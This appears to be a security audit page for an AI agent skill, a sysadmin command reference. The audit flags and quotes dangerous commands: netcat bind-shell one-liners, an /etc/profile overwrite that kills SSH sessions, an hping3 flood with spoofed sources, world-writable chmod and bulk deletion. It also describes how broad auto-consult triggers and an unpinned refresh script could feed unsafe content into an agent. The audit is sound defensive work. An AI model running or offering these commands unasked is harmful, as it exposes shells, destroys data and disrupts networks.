Back to skill

Security audit

Sysadmin Toolbox

Security checks for vulnerabilities and agentic risk

Overview

This skill is a broad sysadmin and security command reference, but it includes high-risk copy-paste commands and an unpinned refresh path that users should review carefully before installing.

Install only if you intentionally want a powerful sysadmin and security cheat sheet and are prepared to review commands before use. Disable or narrow auto-consult, avoid automatic refresh from mutable upstream content, and do not run examples that modify /etc, wipe disks, loosen permissions, capture credentials, flood networks, or expose shells except in owned, authorized, isolated environments.

Vulnerability Patterns
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
  • System PersistenceInstalls backdoors, hooks, services, or scheduled tasks that survive the run
  • Insecure DependenciesIntroduces malicious components through unsafe dependency sources
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
Findings (4)

T06 · System Persistence

Error
Location
references/shell-oneliners.md:178
Finding

Persistent System-Wide Login Hook Can Terminate SSH Sessions

Content
View full analysis
/etc/profile << __EOF__ _after_logout() { username=$(whoami) for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do kill -9 $_pid done } trap _after_logout EXIT __EOF__ ``` ### Technical Analysis The command overwrites `/etc/profile`, a system-wide configuration file evaluated by login shells. It installs an `EXIT` trap that searches for SSH processes matching the current username and terminates them using `SIGKILL`. This behavior exceeds the minimum privileges required by a sysadmin command-reference Skill. It requires elevated write access to `/etc/profile`, modifies behavior across future sessions, and does not preserve the existing profile. The process selection pipeline is also imprecise: textual matching through `ps`, `grep`, and a username can select unrelated or administratively important processes. The modification persists after the originating command or Skill interaction ends. There is no backup, confirmation, ownership validation, rollback procedure, or warning about its system-wide scope. ### Attack Path 1. A user asks a general shell or SSH administration question, causing the Skill to auto-consult the command reference. 2. The profile-modification recipe is returned or recommended without an explicit production-safety boundary. 3. A privileged user executes the command. 4. The existing `/etc/profile` is replaced with attacker-influenced or unsafe content. 5. Future login shells install the exit trap. 6. When a shell exits, matching SSH processes are forcibly terminated. 7. Administrators or users may lose active sessions, and the behavior continues until `/etc/profile` is repaired. ### Impact Assessment Successful use can obtain persistent control o ...[truncated 528 chars]
Remediation
View remediation

T04 · Embedded Malicious Code

Error
Location
references/shell-oneliners.md:1997
Finding

Unauthenticated Interactive Remote-Shell Recipes

Content
View full analysis
nc -l 5000 -e /bin/bash client> nc 10.240.30.3 5000 # 2) server> rm -f /tmp/f; mkfifo /tmp/f server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f client> nc 10.240.30.3 5000 ``` ``` ### Technical Analysis The commands connect an interactive Bash process directly to a Netcat listener. The first variant explicitly uses `nc -e /bin/bash`; the second uses a named pipe to achieve equivalent shell input and output redirection. The listener provides no authentication, encryption, command authorization, session isolation, or peer verification. Anyone able to reach an exposed listener can interact with the shell under the privileges of the process that launched it. Commands and output may also traverse the network in plaintext. Although remote shells can appear in authorized penetration-testing material, this Skill is configured for broad automatic consultation, including routine troubleshooting and shell scripting. The recipe is not isolated to a lab-only reference and is not accompanied by mandatory authorization, containment, or exposure warnings. The second example also contains an apparent addressing inconsistency: the server binds to `127.0.0.1`, while the client example connects to `10.240.30.3`. This does not eliminate the underlying remote-shell behavior; changing the bind address or forwarding the loopback port would expose it. ### Attack Path 1. A user asks about Netcat, remote troubleshooting, shell commands, or penetration testing. 2. The Skill loads the reference and presents the remote-shell recipe. 3. The command is launched by a user or service account. 4. Netcat binds a listening socket and connects incoming data to an interactive Bash proces ...[truncated 926 chars]
Remediation
View remediation

T08 · Insecure Dependencies

Error
Location
scripts/refresh.sh:8
Finding

Unpinned Upstream Content Can Replace Agent-Consumed Instructions

Content
View full analysis
/dev/null cd "$TEMP_DIR" # Extract sections echo "📦 Extracting references..." awk '/^#### Shell One-liners/,/^#### Shell Tricks/' README.md > "$SKILL_DIR/references/shell-oneliners.md" awk '/^#### Shell Tricks/,/^#### Shell Functions/' README.md > "$SKILL_DIR/references/shell-tricks.md" awk '/^#### CLI Tools/,/^#### GUI Tools/' README.md > "$SKILL_DIR/references/cli-tools.md" awk '/^#### Web Tools/,/^#### Systems\/Services/' README.md > "$SKILL_DIR/references/web-tools.md" awk '/^#### Hacking\/Penetration Testing/,/^#### Your daily knowledge/' README.md > "$SKILL_DIR/references/security-tools.md" ``` The refresh behavior is advertised in `SKILL.md`, lines 62–72: ```bash ## Keeping Current References auto-refresh weekly (Sundays 5am ET) from the upstream repo: ```bash ~/clawd-duke-leto/skills/sysadmin-toolbox/scripts/refresh.sh ``` Manual refresh anytime: ```bash ./scripts/refresh.sh [skill-dir] ``` ``` ### Technical Analysis The refresh script clones the current head of a mutable GitHub default branch. It does not pin a reviewed commit or release, verify a Git signature, validate a checksum, authenticate an expected content manifest, inspect changes, or require approval before deployment. Extracted sections from the upstream `README.md` directly overwrite all local reference files. Those files are subsequently loaded as Agent guidance. Consequently, the effective instructions can change after the package has been audited. HTTPS protects transport against ordinary net ...[truncated 1848 chars]
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
references/shell-oneliners.md:405
Finding

Unsafe Recursive Permission Changes and Irreversible File Deletion

Content
View full analysis
-print find /etc -type f -user -name "*.conf" # Group: find /opt -group find /etc -type f -group -iname "*.conf" ``` ###### Find files and directories for all without specific user/group ```bash # User: find . \! -user -print # Group: find . \! -group ``` ###### Looking for files/directories that only have certain permission ```bash # User find . -user -perm -u+rw # -rw-r--r-- find /home -user $(whoami) -perm 777 # -rwxrwxrwx # Group: find /home -type d -group -perm 755 # -rwxr-xr-x ``` ###### Delete older files than 60 days ```bash find . -type f -mtime +60 -delete ``` ``` ### Technical Analysis The `chmod 766` example makes every matched file writable by the owner, group, and all other local users. On a web root, this can allow unrelated local accounts or compromised processes to modify application code or static content. The recursive group-write examples similarly apply broad access without checking current ownership, intended deployment roles, inherited ACLs, file sensitivity, or whether the working directory is correct. The deletion command permanently removes all regular files older than 60 days below the current directory. It provides no preview, path validation, interactive confirmation, mount-b ...[truncated 1495 chars]
Remediation
View remediation
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • YARA SignaturesMalware Match, Webshell Match, Cryptominer Match
Findings (42)

YARA rule 'reverse_shell': Reverse shell patterns in scripts or source code [malware]

Critical
Category
YARA Match
Confidence
100% confidence
Finding

The 'nc -l 5000 -e /bin/bash' pattern is a textbook remote shell/backdoor primitive that grants any connecting party shell access. In an auto-consulted skill intended for admins and security users, including this as a ready-made one-liner creates severe abuse potential and accidental deployment risk.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 2001)May include surrounding context.

ename.in` - send data to remote host

bash
nc -vz 10.240.30.3 5000
  • -v - verbose output
  • -z - scan for listening daemons
bash
nc -vzu 10.240.30.3 1-65535
  • -u - scan only udp ports
Transfer data file (archive)
bash
server> nc -l 5000 | tar xzvfp -
client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000
Launch remote shell
bash
# 1)
server> nc -l 5000 -e /bin/bash
client> nc 10.240.30.3 5000

# 2)
server> rm -f /tmp/f; mkfifo /tmp/f
server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f
client> nc 10.240.30.3 5000
Simple file server
bash
while true ; do nc -l 5000 | tar -xvf - ; done
Simple minimal HTTP Server
bash
while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done
Simple HTTP Server

Restarts web server after each request - remove while condition for only single connection.

bash
cat > index.html << __EOF__
<!doctype html>
    <head

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 26)May include surrounding context.

md
| `references/shell-oneliners.md` | Need practical commands for: terminal, networking, SSL, curl, ssh, tcpdump, git, awk, sed, grep, find |

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 27)May include surrounding context.

md
| `references/cli-tools.md` | Recommending CLI tools: shells, file managers, network utils, databases, security tools |

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 28)May include surrounding context.

md
| `references/web-tools.md` | Web-based tools: SSL checkers, DNS lookup, performance testing, OSINT, scanners |

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 29)May include surrounding context.

md
| `references/security-tools.md` | Pentesting, vulnerability scanning, exploit databases, CTF resources |

YARA rule 'info_stealer': Information stealer patterns (credential harvesting, browser data theft) [malware]

High
Category
YARA Match
Confidence
90% confidence
Finding

The inclusion of Mimikatz is high risk because it is strongly associated with credential dumping and post-exploitation theft of Windows secrets. Even as a reference entry, surfacing it through an auto-consulted skill can facilitate credential theft workflows or normalize malware-adjacent tooling in non-authorized contexts.

Content

Scanner excerpt · references/security-tools.md (reported line 59)May include surrounding context.

md
it"><b>AutoSploit</b></a> - automated mass exploiter.<br>
&nbsp;&nbsp; <a href="https://github.com/TH3xACE/SUDO_KILLER"><b>SUDO_KILLER</b></a> - is a tool to identify and exploit sudo rules' misconfigurations and vulnerabilities.<br>
&nbsp;&nbsp; <a href="https://github.com/VirusTotal/yara"><b>yara</b></a> - the pattern matching swiss knife.<br>
&nbsp;&nbsp; <a href="https://github.com/gentilkiwi/mimikatz"><b>mimikatz</b></a> - a little tool to play with Windows security.<br>
&nbsp;&nbsp; <a href="https://github.com/sherlock-project/sherlock"><b>sherlock</b></a> - hunt down social media accounts by username across social networks.<br>
&nbsp;&nbsp; <a href="https://owasp.org/www-project-threat-dragon/"><b>OWASP Threat Dragon</b></a> - is a tool used to create threat model diagrams and to record possible threats.<br>
</p>

##### :black_small_square: Pentests bookmarks collection

<p>
&nbsp;&nbsp; <a href="http://www.pentest-standard.org/index.php/Main_Page"><b>PTES</b></a> - the penetrat

Missing User Warnings

High
Category
Not specified by scanner
Confidence
95% confidence
Finding

This section overwrites /etc/profile and installs an EXIT trap that force-kills sshd-related processes for the current user, affecting all future sessions system-wide. Presenting this without strong warnings or rollback guidance is dangerous because it can terminate access unexpectedly and break system login behavior.

Content

No source excerpt is available for this finding.

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
88% confidence
Finding

The example recommends chmod 766 recursively on web files, creating world-writable content that can enable tampering or webshell placement by unintended local users or compromised service accounts. In an admin toolbox, unsafe permission defaults are especially risky because users may copy them directly.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 409)May include surrounding context.

Change permission only for files
bash
cd /var/www/site && find . -type f -exec chmod 766 {} \;
cd /var/www/site && find . -type f -exec chmod 664 {} +

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 647)May include surrounding context.

Compare output of two commands
bash
diff <(cat /etc/passwd) <(cut -f2 /etc/passwd)

Context Leakage

High
Category
Data Exfiltration
Confidence
85% confidence
Finding

The terminal recording example stores full session logs and timing data, which can capture commands, secrets typed into prompts, tokens, and operationally sensitive output. In a sysadmin/security context, that creates real context-leakage risk if users are not warned about secret handling and storage protections.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 859)May include surrounding context.

Record and replay terminal session
bash
### Record session
# 1)
script -t 2>~/session.time -a ~/session.log

Missing User Warnings

High
Category
Not specified by scanner
Confidence
98% confidence
Finding

The secure-wipe section contains commands that irreversibly destroy files, partitions, swap, and entire disks. Without prominent warnings, device validation steps, and environment constraints, these examples can cause catastrophic data loss from operator error.

Content

No source excerpt is available for this finding.

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
76% confidence
Finding

The curl example uses '-k', which disables TLS certificate verification and normalizes insecure HTTPS usage. In a troubleshooting skill, this can train users to bypass transport validation and expose them to man-in-the-middle attacks when copied into real workflows.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 1417)May include surrounding context.

Tool: curl
bash
curl -Iks https://www.google.com
  • -I - show response headers only

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 1573)May include surrounding context.

Get public key from private key
bash
ssh-keygen -y -f ~/.ssh/id_rsa
Get all fingerprints

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 1579)May include surrounding context.

Get all fingerprints
bash
ssh-keygen -l -f .ssh/known_hosts
SSH authentication with user password

Credential Access

High
Category
Privilege Escalation
Confidence
70% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 1616)May include surrounding context.

md
### Delete all of ssh-agent's keys.
function _scl() {

  /usr/bin/keychain --clear

}

Credential Access

High
Category
Privilege Escalation
Confidence
70% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 1620)May include surrounding context.

md
### Delete all of ssh-agent's keys.
function _scl() {

  /usr/bin/keychain --clear

}

Credential Access

High
Category
Privilege Escalation
Confidence
70% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 1623)May include surrounding context.

md
### Delete all of ssh-agent's keys.
function _scl() {

  /usr/bin/keychain --clear

}

Credential Access

High
Category
Privilege Escalation
Confidence
70% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 1624)May include surrounding context.

md
### Delete all of ssh-agent's keys.
function _scl() {

  /usr/bin/keychain --clear

}

Missing User Warnings

High
Category
Not specified by scanner
Confidence
97% confidence
Finding

The packet-capture example is explicitly designed to capture plaintext usernames and passwords from HTTP traffic. In a security/toolbox skill, this can facilitate unauthorized credential harvesting or privacy violations if used outside approved monitoring contexts.

Content

No source excerpt is available for this finding.

Missing User Warnings

High
Category
Not specified by scanner
Confidence
99% confidence
Finding

The hping3 example uses flood mode with randomized source addresses, which is a classic denial-of-service style traffic generation pattern. Providing it as a ready-to-run one-liner without strict lab-only framing materially increases misuse risk and potential service disruption.

Content

No source excerpt is available for this finding.

YARA rule 'offensive_tool_references': References to well-known offensive security tools [hacktools]

High
Category
YARA Match
Confidence
70% confidence
Finding

YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).

Content

Scanner excerpt · references/shell-oneliners.md (reported line 1886)May include surrounding context.

set icmp type (default icmp-echo = 8)

bash
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host>
  • --flood - sent packets as fast as possible (don't show replies)
  • --rand-source - random source address mode
  • -d --data - data size
  • -w|--win - winsize (default 64)

Tool: nmap
Ping scans the network
bash
nmap -sP 192.168.0.0/24
Show only open ports
bash
nmap -F --open 192.168.0.0/24
Full TCP port scan using with service version detection
bash
nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24
Nmap scan and pass output to Nikto
bash
nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h -
Recon specific ip:service with Nmap NSE scripts stack
bash
# Set variables:
_hosts="192.168.250.10"
_ports="80,443"

# Set Nmap NSE scripts stack:
_nmap_nse_scripts="+dns-brute,\
                   +http-auth-finder,\
                   +http-chrono,\

Missing User Warnings

High
Category
Not specified by scanner
Confidence
100% confidence
Finding

The netcat section includes direct remote shell patterns, including 'nc -e /bin/bash' and a FIFO-based shell construction. These are standard backdoor/reverse-shell techniques that enable arbitrary command execution over the network and are highly dangerous in an auto-consulted skill.

Content

No source excerpt is available for this finding.

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
98% confidence
Finding

This FIFO-plus-bash netcat construction is another remote shell/backdoor pattern enabling arbitrary command execution over a socket. The use of rm/mkfifo is not the core problem; the overall one-liner is a copy-pastable offensive shell payload.

Content

Scanner excerpt · references/shell-oneliners.md (reported line 2005)May include surrounding context.

client> nc 10.240.30.3 5000

2)

server> rm -f /tmp/f; mkfifo /tmp/f server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f client> nc 10.240.30.3 5000

text

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The skill description declares very broad AUTO-CONSULT triggers covering common sysadmin, DevOps, troubleshooting, scripting, and security topics. In an agent environment, this can cause the skill to be invoked far more often than necessary, unnecessarily expanding the model's attack surface and increasing the chance that risky reference content or shell-oriented guidance influences unrelated conversations.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The 'When to Auto-Consult' section uses ambiguous conditions such as 'asking what tool for...' and 'doing security audits or pentesting' without scope limits, authorization checks, or user-confirmation gates. Because this skill contains operational and offensive-security references, broad activation can surface dual-use or harmful guidance in contexts where it was not clearly requested or appropriate.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.